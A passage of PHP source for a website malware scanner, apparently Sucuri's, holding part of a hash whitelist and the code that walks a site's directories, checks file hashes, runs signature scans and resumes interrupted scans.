	'3ca3e467b7d4d6b403aa4619019d9250b11449c8ee9c91c90bcbc9acdd64fea2' => 1,
	'5631d6dfa342e51c9cbebf3c4ce30c3afe765a8d9f5259820396829659abb54b' => 1,
	'7df021a20fee6b9fc90ea59075c586847fa077033f998ab907faf9164af26c25' => 1,
	'1a8cb2c729245d04a5efc2e19d89e0081f9578ea6f6033c5b8750da22136a0e3' => 1,
	'b6e3c965ae80794c01820cd551f4ccc58f0a3a619cf973794650fb1e12f294de' => 1,
	'92f9298b1be8c1f1a67bdd7da6ce3d0b2cd79dbb5539b823050e07f16a33e777' => 1,
	'2d77db63790f14fae32bbcbc8ee5b738591178c352c8d8e71cd181fa503fe4e5' => 1,
	'18a5e4ee0809403c743447ff7f3b30016e30f3a8b2aabce8f7547efb86920840' => 1,
	'bd576bb71c22877fb3c09f6fd8abcd3e5d7bd2a4d88a8eddc534e328ce07cd01' => 1,
	'5982fa44cd2130e820f7c62a76fa3fa4a068ffbdd36045d25714ced53e9ba282' => 1,
	'd843463a1920b452dec30cd2e805c7cfdc5976cc068a0ffd6588d8430aa7fdcb' => 1,
	'6151e12e4823d206cf25310f988051c5f901577c2c2bfaf1cec50845b71346a1' => 1,
	'8b3c48ab6cfd3833e80cd18e8eee56e5d8fcbcaf48c48d00dc6969278c269ed7' => 1,
	'af1ce4418e3005e85f92d4adf9d6e4135b6020ed9cf9337f69a025ae578edb9e' => 1,
	'836f474073613e7ec62cd72695c9e78f476934f8fdb0e3166dd916cd5aff98d4' => 1,
	'b5395c833ff802b735ee54aa7ee540bfcd4256a5d1dc83368ba255a590665b93' => 1,
	'cff0ea731d8d8471bb4451eaf88b36529bd141381fd7a1bba4b26a138be3ac9b' => 1,
	'bdcbe76930d2dddb05e67e1039720ed0266d329a51d1c49dfe761c89eb305a94' => 1,
	'3bd3b7367ff2ba587d8e56a0b173b71b936160ce789c04ad15b4836fb8ccf4f7' => 1,
	'8c1df954b245df4d55bf686bfd0a0a0c0c5e727fcaf716fb5f050f99fc9e7420' => 1,
	'8f2ec9c8a8c91e612cc0d319a6d0a191e15b590e1026fd65f0b4ee195eca5dc3' => 1,
	'e97063f115e9b1e0ddddf6c1a4f3e05149ffdb0cde1dc7acb7eb08392c3ebcea' => 1,
	'e20ab2ecd011efeeffa1e3161382cb8727f8af7c566d5b42123725f5f5a8bfba' => 1,
	'10446fcfc406f1ac6ebbe55503d7f9ba188635b31559a5ecd38cc2827aa0c131' => 1,
	'e523e373a2255820c2537a29c3f5381d74fa17296ab161073b5722ec28788218' => 1,
	'90a40ba2202b2912e6781312448a83732b16645bbfacca48edcaa425db658ea6' => 1,
	'a59440c63cdd7bc26d964b4d922cd6c1eb0e632d424efdd5ff214285e31c386f' => 1,
	'70a4520b9bfffcd0784b7d41720b8027d224c7496b8f7c72bd5d802a2039b5cc' => 1,
	'187329e6ba15cb641abb71b1d32d326e9284102e251bcf863f70553e76a5ad4d' => 1,
	'6e1e23d4ae6497cae034d73b9bdff9a750929110f1fe89f972b389a235257cb4' => 1,
	'a703804004cb80ea012544f26601dc4b26e37eb71107a0d3dc94a4211bbbb859' => 1,
	'9e4a02ac7d371792289afff82d54b842877627dab530c0f2b8fd9812464785e3' => 1,
	'9e9bdff6c3bc913ebfa21571c268aad7e442325703cc35fc5093b87fae7cc5b4' => 1,
	'7e4b4c6f60b05c15d97771f203880cf6f3d0853ce342338ac2dac9236928a16e' => 1,
	'b99148052ecbd0b8f3065c6babefb0e19d474686f4c7a3a8efc0049db9b0a2ba' => 1,
	'52ed56d9b91d69af08648f913e759cac9c29b6823815ee5e173821dcfbe38a98' => 1,
	'cfcc2436777e5e08c81a93a1ae4b112745f6b8af69bb3ee6455162fac508dd4e' => 1,
	'1fb9b6d4548139336c49a57f7d6b333d37133b3838087a8e87367098419300e1' => 1,
	'd537656b650a2f891cb686caa85d7739fc5ade895f804b81eee62224264904d0' => 1,
	'ada4cf8909ada62ca717a19fd8dfa190d0662c334dc530c717e53dfbf13fe345' => 1,
	'1ecd395fad84fbfa698d9482fc1c5f6b7b7b702c19afd954d2a6b6db999104ea' => 1,
	'c318f2adabcd16a4bfbfce80d08b975155ff5293d58ea0b5a3b1ddac0f99cb2c' => 1,
	'1ce6014071a0fd2f537c53f36b17b6c803f7be5ceb96970a68ea293e585d996b' => 1,
	'4f5b2528815d8b1cd9b68b1a4bb1fe689696f8dcbc2c4a5104343b886ee68828' => 1,
	'8dcc151b5b22a2401abefec879e3feabed7e40912d04d71e4d93f0964e48b3aa' => 1,
	'35bd7c89dbf4380a20a5b2736ba546d7d7d8ef53b6969e10c741ea94f006acc1' => 1,
	'7835140cdf33dde072cd4f9695c85076aee1d326638c67f06da561272e9ae4ea' => 1,
	'bcb42c4f5eb5b4c7ee08632af417513c6f6002fdf7d4b8d2dea6376f0cadd563' => 1,
	'55ff4a1f3c853e67ca22c655445af7e585dd7dbfca999fc45fbb8367cc6f0fa8' => 1,
	'8c0d0ec619c9b352eda1e4ffa4b60d9fd194ee5bcaeba5a30d2a77fe5c9b2892' => 1,
	'76a8f9e3be705580f32a9cfeb500b7b7343d7f1b244f455b04f0586a07375faa' => 1,
	'15244ca7aea2452ed1d66b0bd2aac4ba82e6bc59cd064761788d8494a9ab2728' => 1,
	'23d46face3bfca24982a680ff045045a1237e1a9759734194369dd9f5276e57c' => 1,
	'b8bda46134a918706ca6bc5e6c0c4e6cb90de338ee85ad7b3d5110f7178a19bb' => 1,
	'b2eb23d7bcc444e7932e90ef013d17f7183959e31fbca87c40687dcae17fae01' => 1,
	'8b2d9ac157d95118adfd9a7d005804167e889375cf4e49942e6a78196465716c' => 1,
	'27c7b2fcb0fa0b1b0e825cd45a8e805990577444eaa53520cb2f26fe98667fa4' => 1,
	'66d905c2d102fb6d1513663641656888dbcc0c6f3b9db87bd6af80d9ffba8274' => 1,
	'f7655b9138a7f85d7b7e1595f1bee8ff2cc0d01d795b7fd12e4c9f871f607a4a' => 1,
	'4d9c7a4ecffe0eb62aeb28d90cb93f4efd0f4e510948fb210d7e94d77dd6d637' => 1,
	'82b5e245460a07ec9ce813c6ceab1ae5a00ecb0b87c9edeaf05aa0e3870a5125' => 1,
	'dd8fb849db84b11b479029533fd942f0c2ad9b913c15a48c44e3a8cee947f72f' => 1,
	'e3037514d22c4135908b529ba178b75e2637470e8979adab39811d5566e28edf' => 1,
	'629ecbc8c7f19382e2013b9a86c945ed400a965ba4a50559e328bd54abc1756d' => 1,
	'6a0acff70a8172a9044151ddb809a78e7d661229196d7ae5e19bf602e8f3de33' => 1,
	'e100d66244f3e18a058aa0417311a57912e2096f5ec95c7935c0c89ecc74dc58' => 1,
	'2433be9ff04e376f0621a71967656890de27178febaaa1f7e08cb9c5b564a7d0' => 1,
	'73ccd554d4a5c0aa9f02bdcf40eb49247e544807fae3b2442a877d9091093d0f' => 1,
	'fb25094e0f09528f3245bfbd3069b2d6aacff50dedf03a724bd0e657ff1cbecb' => 1,
	'27ae4616a88c7ee6031f7db70aa0781c7d68e9c275617c3a90e0301629cfd4a2' => 1,
	'bb0dfcbe5264237a2548a8f90858b0fb3273cf7eafb84dc9aab1970dff72b8d6' => 1,
	'0fc5d1a391a5280dc86d3e1dc316fc9342398ca099c8f4c9366e3cae93524da4' => 1,
	'58cfdefac140855a4fc745c3aaf941c36d0d3a4ac9c380ee2dd99f8932645dd6' => 1,
	'6eea52a23b1d4a5f369c7c524ae2f308dccc3817168f082333ecd6959156358f' => 1,
	'7ef507ae1daa1ebbac1f318de56083b708c97b882a0e2380e313add81834dc0d' => 1,
	'ca5fa8e6629351446f5040fabcbb76400291e377d083d5324ad68c58dd9e3c54' => 1,
	'31281e71e9bcf327dc523a76f984a0108d2df66e7d88b747d4569adbc7c5fe50' => 1,
	'f61348f95a6103ea3ca1ef4ee693a27f55c31a52544a02a7b1a74dc3dc678cde' => 1,
	'ffc4e63c0732e9048cddc05a03d8d30aa24d18611c5c4ec3751dd95d995f4c5d' => 1,
	'32184563164f27fd2b2a9aaeaa45fd224d1cda1c6b95697b6110b8ccc2fcacdd' => 1,
	'e5327fe481c33cd942da5a3311d6de33df87314a5e82f7e8edc1b438877a865f' => 1,
	'953896db78f293be848f7831519d827c8ef6196a368773b5ceb345b4676b6558' => 1,
	'2fa1312e6fa8fcafa92c5652dcafdb9f68919f975d1121405302685e12d4813f' => 1,
	'425d6d410a983e1a96966f2b7270038b1c95f1c72e3e506a15ddffccb0c08753' => 1,
	'41f8968ca3ac9636746e851dc60f29995a7034ca4de8cdb019a753653e12ae32' => 1,
	'688f583c4a5b975720ee275f976e41e26ec5599c3ea2f177abc62e7e33210773' => 1,
	'2bb6c3c3c985b555a2e93a34a8ac921d37fa0b9f12b23d3b7abf233066aa3d2f' => 1,
	'cbac4ae83633fe586f4ae343203c9f57976e4dda8e620f2392695a0c9c74dc50' => 1,
	'c605ea0fd3f3b39f6b5c3546e89f42d24b77dcd7a0f7128ca1cd9a86ab058448' => 1,
	'534275ba6ff559ef7ccc186407bcc5d922f680b2218c5e30599d17771bd3a5c1' => 1,
	'9b2ae1fb8e7790522053194f22c2236062e1bed2cc4b13616e750f5d9451fec4' => 1,
	'51d7671b44530d53b57320442f8cf3e994b0716aacfbb5927ff28aceed37f3e8' => 1,
	'a98700c244653c1dc8494c67171249d32c9f0686a2c299ca5f329d9586184897' => 1,
	'3c5e413bd5348d3a895b682eb0d05ea98b0626fc2a4ea45bd9eca1b6fe8444cc' => 1,
	'ed877fc800085fadb5f61e5d581a48892d5fd79e32295b1f88a18d58cdf14480' => 1,
	'b838ecfdc96737445b30773f0215a3da32432aa945c4a29a37a88c96fa570bd2' => 1,
	'c85c2880623b92d437d65570977dd99a85923c446664f72bf2f5c27ed6378aee' => 1,
	'01ad163ffc8687a562ad616e702ffec7213d08103587b61c880918ff96bd1246' => 1,
	'337d33a7e0d8a55de3d8d45881ceed4ed3535a85347a2f76656853bea6d25120' => 1,
	'4dd4729ba092306752ca0c147164ea086bc6f59abf48dc16c40f3375d3a3e1e8' => 1,
	'b8b620fd24cbffd92c32e1147ed39f3d9c50049e0c88ae5637634c6b4b87fc58' => 1,
	'04625699c9f6760a66ae6151b926c1f920e4aaceb143a85f295e0b1228f69074' => 1,
	'd4fa31e49d8118413ed3d17593e0a8fb610e6591da69b4362b4843d3e4532025' => 1,
	'71ffe469e4ece0e7cf78de13fec66c6fca078bef5ecb111dff2044731e100973' => 1,
	'abafe7d1a3a4c8d3ab1a35a105eb84b9935ef9d2235996127192108d7f636e2b' => 1,
	'd80a8e4bd6d4d111b6bd6d02c907dbb61db013fd3764afa08f4a592d7170a88d' => 1,
	'75ea5c80e377444c8a390c06d1b927f135cb66914a8c9de20e60adbdd57a6e19' => 1,
	'7e57f1eb27c60bb77dd396548b43d243976708683f9f8e5f7febc4cc5b6cabbc' => 1,
	'09660398af966e4752715f286b315266854f995b5c74a36fc62d2133e981c901' => 1,
	'f64f70067d7e323b85a39024ccb7fd87c88fcc6a2719b41bbccf2f361b2c59f4' => 1,
	'f22c9247029c97fc34fce70a32ee47b5372575826fabc789f6aeaf56eb2c2d4d' => 1,
	'eb86f8caf7237b0a27b7cfbbc2ad2af2ef69542ac65f4aa772a20193b4531424' => 1,
	'df1d55974da0355f6233eb3901a74d249e5e838dd7802a8f95081e7641f6e786' => 1,
	'686eb71ccd8f41c64bcdb493c158dc1dd5bff672f1d674c0b663d8d911c2b4c5' => 1,
	'ae7536b09631ed1643d18aada39ddc020859b1ff02458f3b6add612e570591fb' => 1,
	'a9aa1e8abf92807ffc262349b9852c5106de46af858d9b1701ba163bb34a0fca' => 1,
);

function checkMD5($fullName)
{
    global $MD5_WHITELIST, $g_lastFileName, $g_lastDirs, $g_useSHA256;
    
    if ($g_lastFileName !== false) {
        if ($g_lastFileName !== $fullName) {
            return false; // Skip until the last checked file
        }
        echo 'DEBUG: Resuming after ' . $fullName . " file\n";
        @flush();
        $g_lastFileName = false;
        $g_lastDirs = false;
        return false;
    }
    
    if ($g_useSHA256) {
        $fileHash = @hash_file('sha256', $fullName);
    } else {
        $fileHash = @md5_file($fullName);
    }
    if ($fileHash === false) {
        echo 'Warn: inaccessible file: ' . $fullName . "\n";
        return false;
    }
    
    $fileSize = @filesize($fullName);
    if ($fileSize === false) {
        echo 'Warn: inaccessible file: ' . $fullName . "\n";
        return false;
    }
    

    return !isset($MD5_WHITELIST[$fileHash]);
}

define('SUCURI_RESUME_HEADER', '<?php // ');

function getResumeFileName()
{
    if (!isset($_POST['sscred']) || !preg_match('/^[a-fA-F0-9]+$/', $_POST['sscred'])) {
        return '.sucuri-sss-resume.php';
    }
    
    return '.sucuri-sss-resume-' . $_POST['sscred'] . '.php';
}

function storeResumeInfo($lastFileName)
{

}

function getResumeInfo()
{
    // Remove old SSS resume files if the script failed to resume
    $dir = @opendir('.');
    if ($dir !== false) {
        for (;;) {
            $file = @readdir($dir);
            if ($file === false) {
                break;
            }
            if (!preg_match('/^\\.sucuri-sss-resume(?:-[a-z0-9A-Z]+)?\\.php$/', $file)) {
                continue;
            }
            $date = @filemtime($file);
            if ($date === false || $date >= time() - 36000) {
                continue;
            }
            //echo 'DEBUG: Deleting ' . $file . "\n";
            @unlink($file);
        }
        @closedir($dir);
    }
    
    $f = @fopen(getResumeFileName(), 'r');
    if (false === $f) {
        return false;
    }
    
    $info = fread($f, 65536);
    if ($info === false || strncmp($info, SUCURI_RESUME_HEADER, strlen(SUCURI_RESUME_HEADER)) !== 0) {
        fclose($f);
       // echo "Warn: Reading sucuri-sss-resume failed\n";
        return false;
    }
    
    fclose($f);
    
    return substr($info, strlen(SUCURI_RESUME_HEADER));
}

function cleanResumeInfo()
{
    global $g_resumeHandle;
    
    if (!$g_resumeHandle) {
        return;
    }
    
    fclose($g_resumeHandle);
    
    if (!@unlink(getResumeFileName())) {
        //echo "Warn: deleting resume failed\n";
    }
}


function getLastDirs($lastFileName)
{
    if ($lastFileName === false) {
        return false;
    }
    
    $lastDir = dirname($lastFileName);
    
    $i = 1;
    $lastDirs = array();
    while ($i < strlen($lastDir) && ($i = strpos($lastDir, DIRECTORY_SEPARATOR, $i)) !== false) {
        $lastDirs[substr($lastDir, 0, $i)] = false;
        $i++;
    }
    
    $lastDirs[$lastDir] = true;
    
    return $lastDirs;
}

function testOneLastDir($input, $expected) {
    $found = getLastDirs($input);
    if ($found !== $expected) {
        //echo 'getLastDirs failed for ' . $input . ', found ';
       // var_dump($found);
    }
}

function testGetLastDirs()
{
    // Pathological cases
    testOneLastDir('', array('' => true));
    testOneLastDir('dir/', array('.' => true));
    testOneLastDir('/dir', array('/' => true));
    testOneLastDir('/dir/', array('/' => true));
    testOneLastDir('/my/file', array('/my' => true));
    testOneLastDir('/my/dir/', array('/my' => true));
    testOneLastDir('file.txt', array('.' => true));
    testOneLastDir('dir/file.txt', array('dir' => true));
    testOneLastDir('my/dir/file.txt', array('my' => false, 'my/dir' => true));
    testOneLastDir('wordpress/wp-content/uploads/file.txt', array('wordpress' => false,
        'wordpress/wp-content' => false, 'wordpress/wp-content/uploads' => true));

    // Normal cases
    testOneLastDir('./file.txt', array('.' => true));
    testOneLastDir('./dir/file.txt', array('.' => false, './dir' => true));
    testOneLastDir('./my/dir/file.txt', array('.' => false, './my' => false, './my/dir' => true));
    testOneLastDir('./wordpress/wp-content/uploads/file.txt', array('.' => false, './wordpress' => false,
        './wordpress/wp-content' => false, './wordpress/wp-content/uploads' => true));
}


/* Scan all files. */
function scanMalware($dir)
{
    global $SSS_EXTENSIONS, $g_lastDirs, $g_lastTrace;
    global $SUCURI_SIGS;

    $dh = opendir($dir);
    if (!$dh) {
        return 0;
    }

    if (microtime(true) - $g_lastTrace > 5) {
        // Print every 5 seconds to keep connection from being closed by WAF
       // echo "DEBUG: Recursing malware scanner into $dir\n";
        @flush();
        $g_lastTrace = microtime(true);
    }
    $resumeFile = getResumeFileName();

    while (($myfile = @readdir($dh)) !== false) {
        if ($myfile == '.' || $myfile == '..' || $myfile == $resumeFile) {
            continue;
        }
        $fullName = $dir . DIRECTORY_SEPARATOR . $myfile;

        $file_for_sss = false;
        foreach ($SSS_EXTENSIONS as $temp_ext) {
            if (false !== stripos($myfile, $temp_ext)) {
                $file_for_sss = true;
                break;
            }
        }

        /* Skip PHP files over 5mb - https://sucuri.atlassian.net/browse/RESEARCH-3982 */
        $filesize = @filesize($fullName);
        if ($temp_ext === '.php' && $filesize > 1024 * 1024 * 5) {
            continue;
        }

        if (strpos($myfile, 'sucuribackup.') !== false) {
            continue;
        } elseif ($myfile == 'mw-search.php' ||
                $myfile == 'sucuri-wpdb-clean.php' ||
                $myfile == 'sucuri-db-cleanup.php' ||
                $myfile == 'sucuri_db_clean.php' ||
                $myfile == 'sucuri-cleanup.php' ||
                $myfile == 'sucuri-db-backup-c.php' ||
                $myfile == 'sucuri-db-backup-d.php' ||
                $myfile == 'sucuri-new-cleanup.php' ||
                $myfile == 'sucuri_backdoor_removal.php' ||
                $myfile == 'sucuri-filemanager.php' ) {
            $changetime = filemtime($dir . DIRECTORY_SEPARATOR . $myfile);

            //checking if file is too old (over 24 hrs), remove it
            if (( $changetime + 60 * 60 * 24 ) < time()) {
                @unlink($dir . DIRECTORY_SEPARATOR . $myfile);
            }

            continue;
        }

        if ($file_for_sss || $myfile === '.htaccess' || $myfile === 'web.config' || $myfile === 'php.ini') {
            if (checkMD5($fullName)) {
                $fh = @fopen($fullName, 'r');
                if (!$fh) {
                  return(0);
                }
                $buffer = fread($fh, 2000097);
                fclose($fh);
                sigs_loop($SUCURI_SIGS, $buffer, $fullName);
                storeResumeInfo($fullName);
            }
            @flush();
        } elseif (strpos($myfile, '.js') !== false) {
            if (checkMD5($fullName)) {
                storeResumeInfo($fullName);
            }
            @flush();
        }


        if (is_dir($fullName)) {
            if (is_link($fullName)) {
                continue;
            }
            if ($myfile == 'cache') {
                continue;
            }
            if ($myfile == 'w3tc' && strpos($fullName, 'wp-content/w3tc') !== false) {
                continue;
            }
            if ($myfile == 'all-in-one-wp-security-and-firewall' && strpos($fullName, 'wp-content/plugins/all-in-one-wp-security-and-firewall') !== false) {
                continue;
            }
            if ($myfile == 'sucuri' && strpos($fullName, 'wp-content/uploads') !== false) {
                continue;
            }
            if ($g_lastDirs !== false) {
                if (!isset($g_lastDirs[$fullName])) {
                    continue;
                }
                if ($g_lastDirs[$fullName] === true) { // Found the last scanned directory
                    //echo 'DEBUG: Resuming from ' . $fullName . " directory\n";
                    @flush();
                }
            }
            scanMalware($fullName);
        }
    }
    closedir($dh);
}

if (!headers_sent()) {
    header('Content-Type: text/plain');
}

$g_lastFileName = getResumeInfo();
$g_lastDirs = getLastDirs($g_lastFileName);
$g_lastTrace = microtime(true);

$g_useSHA256 = function_exists('hash_file') && in_array('sha256', hash_algos());

if ($g_lastFileName === false) {
    echo 'Scanning started - ' . date("Y-m-d H:i:s") . "\n\n";
} else {
    echo 'Scanning resumed - ' . date("Y-m-d H:i:s") . "\n\n";
}
@flush();

$path = '.';

if ($g_lastFileName === false) {
    runVersionCheck($path, 'printVersionServerSide');
}

scanMalware($path);

cleanResumeInfo();

echo "\n" . 'Scanning complete - ' . date("Y-m-d H:i:s") . "\n\n";
@flush();
exit();
